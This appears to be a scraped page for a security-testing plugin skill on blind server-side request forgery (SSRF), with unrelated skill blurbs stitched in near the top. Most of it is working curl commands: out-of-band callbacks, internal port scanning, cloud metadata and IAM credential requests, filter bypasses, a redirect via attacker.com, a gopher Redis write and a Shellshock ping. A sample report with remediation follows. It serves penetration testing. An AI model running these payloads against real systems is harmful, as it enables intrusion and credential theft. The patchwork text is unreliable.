npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skillsThis skill uses the workspace's default tool permissions.
- When testing URL/webhook input parameters where server-side responses are not reflected
Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.
Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.
Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.
# Common SSRF-susceptible parameters:
# url=, uri=, path=, dest=, redirect=, src=, source=
# link=, imageURL=, callback=, webhook=, feed=, import=
# Test URL fetch functionality
curl -X POST http://target.com/api/fetch-url \
-H "Content-Type: application/json" \
-d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}'
# Test webhook configuration
curl -X POST http://target.com/api/webhooks \
-H "Authorization: Bearer TOKEN" \
-H "Content-Type: application/json" \
-d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}'
# Test image/avatar URL
curl -X POST http://target.com/api/profile/avatar \
-H "Authorization: Bearer TOKEN" \
-H "Content-Type: application/json" \
-d '{"avatar_url": "http://COLLABORATOR.oastify.com/avatar.png"}'
# Test document import
curl -X POST http://target.com/api/import \
-H "Content-Type: application/json" \
-d '{"import_url": "http://COLLABORATOR.oastify.com/data.csv"}'
# Use Burp Collaborator for DNS + HTTP callbacks
# Generate collaborator payload: xxxxxx.oastify.com
# DNS-based detection (works even with HTTP blocked)
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://dns-only-test.COLLABORATOR.oastify.com"}'
# Check Collaborator for DNS lookups
# HTTP-based detection
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://http-test.COLLABORATOR.oastify.com"}'
# Check for HTTP requests in Collaborator
# interact.sh alternative
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://RANDOM.interact.sh"}'
# Monitor interact.sh dashboard for interactions
# Scan internal IP ranges via blind SSRF
# Use timing differences to determine if hosts are alive
# Scan common internal ranges
for ip in 10.0.0.{1..10} 172.16.0.{1..10} 192.168.1.{1..10}; do
start=$(date +%s%N)
curl -X POST http://target.com/api/fetch -d "{\"url\": \"http://$ip/\"}" -s -o /dev/null --max-time 5
end=$(date +%s%N)
elapsed=$(( (end - start) / 1000000 ))
echo "$ip: ${elapsed}ms"
done
# Port scanning via blind SSRF
for port in 80 443 8080 8443 3000 5000 6379 27017 5432 3306 9200; do
curl -X POST http://target.com/api/fetch \
-d "{\"url\": \"http://127.0.0.1:$port/\"}" -s -o /dev/null -w "%{time_total}\n"
echo "Port $port tested"
done
# Use gopher:// for more advanced internal service interaction
curl -X POST http://target.com/api/fetch \
-d '{"url": "gopher://127.0.0.1:6379/_INFO"}'
# AWS metadata (IMDSv1)
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/latest/meta-data/"}'
# AWS IAM credentials
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'
# GCP metadata
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://metadata.google.internal/computeMetadata/v1/"}'
# Azure metadata
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}'
# DNS rebinding for metadata access (bypass IP blocking)
# Use services like rebinder.net to create DNS rebinding domains
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://A.169.254.169.254.1time.YOUR-REBIND-DOMAIN.com/"}'
# IP representation bypass
curl -X POST http://target.com/api/fetch -d '{"url": "http://0x7f000001/"}' # Hex
curl -X POST http://target.com/api/fetch -d '{"url": "http://2130706433/"}' # Decimal
curl -X POST http://target.com/api/fetch -d '{"url": "http://0177.0.0.1/"}' # Octal
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.1/"}' # Short
curl -X POST http://target.com/api/fetch -d '{"url": "http://[::1]/"}' # IPv6
# URL parsing confusion
curl -X POST http://target.com/api/fetch -d '{"url": "http://target.com@127.0.0.1/"}'
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.0.0.1#@target.com/"}'
# Redirect-based bypass
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://attacker.com/redirect?url=http://169.254.169.254/"}'
# DNS rebinding
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://make-169-254-169-254-rr.1u.ms/"}'
# Exfiltrate data via DNS (when only DNS callback works)
# If you achieve SSRF to a service that reflects data:
# Chain: SSRF -> internal service -> DNS exfiltration
# Use gopher protocol for Redis command execution
curl -X POST http://target.com/api/fetch \
-d '{"url": "gopher://127.0.0.1:6379/_SET%20ssrf_test%20exploited%0AQUIT"}'
# Chain blind SSRF with Shellshock on internal hosts
curl -X POST http://target.com/api/fetch \
-d '{"url": "http://internal-cgi-server/cgi-bin/test.sh"}'
# With User-Agent: () { :; }; /bin/bash -c "ping -c1 COLLABORATOR.oastify.com"
# Exploit internal services via SSRF
# Redis: write SSH key
# Memcached: inject serialized objects
# Elasticsearch: read indices
# Internal API: access authenticated endpoints
| Concept | Description |
|---|---|
| Blind SSRF | Server makes request but response is not visible to attacker |
| Out-of-Band Detection | Using external callbacks (DNS, HTTP) to confirm SSRF execution |
| DNS Rebinding | Technique to bypass IP-based SSRF filters by changing DNS resolution |
| Cloud Metadata | Instance metadata endpoints accessible via SSRF for credential theft |
| Gopher Protocol | Protocol allowing crafted payloads to interact with internal TCP services |
| Time-Based Detection | Detecting SSRF success by measuring response time differences |
| SSRF Chain | Combining SSRF with other vulnerabilities for greater impact |
| Tool | Purpose |
|---|---|
| Burp Collaborator | Out-of-band interaction server for DNS and HTTP callback detection |
| interact.sh | Open-source OOB interaction tool by ProjectDiscovery |
| SSRFmap | Automated SSRF detection and exploitation framework |
| Gopherus | Generate gopher payloads for exploiting internal services via SSRF |
| webhook.site | Free webhook receiver for testing SSRF callbacks |
| rebinder.net | DNS rebinding service for bypassing SSRF IP filters |
## Blind SSRF Assessment Report
- **Target**: http://target.com/api/fetch-url
- **Detection Method**: Burp Collaborator DNS + HTTP callback
- **Internal Access Confirmed**: Yes
### Findings
| # | Input Point | Payload | Detection | Impact |
|---|------------|---------|-----------|--------|
| 1 | POST /api/fetch url parameter | http://collaborator | HTTP callback | Confirmed SSRF |
| 2 | POST /api/avatar avatar_url | http://169.254.169.254 | Timing (2.3s vs 0.1s) | Cloud metadata |
| 3 | POST /api/webhook callback | gopher://127.0.0.1:6379 | Redis write confirmed | RCE potential |
### Internal Network Map
| Host | Port | Service | Accessible |
|------|------|---------|-----------|
| 10.0.0.5 | 6379 | Redis | Yes |
| 10.0.0.10 | 9200 | Elasticsearch | Yes |
| 169.254.169.254 | 80 | AWS Metadata | Yes |
### Remediation
- Implement allowlist of permitted external domains for URL fetching
- Block requests to private IP ranges and cloud metadata endpoints
- Use IMDSv2 (token-required) for AWS instance metadata
- Disable unused URL schemes (gopher, file, dict)
- Implement network-level segmentation for application servers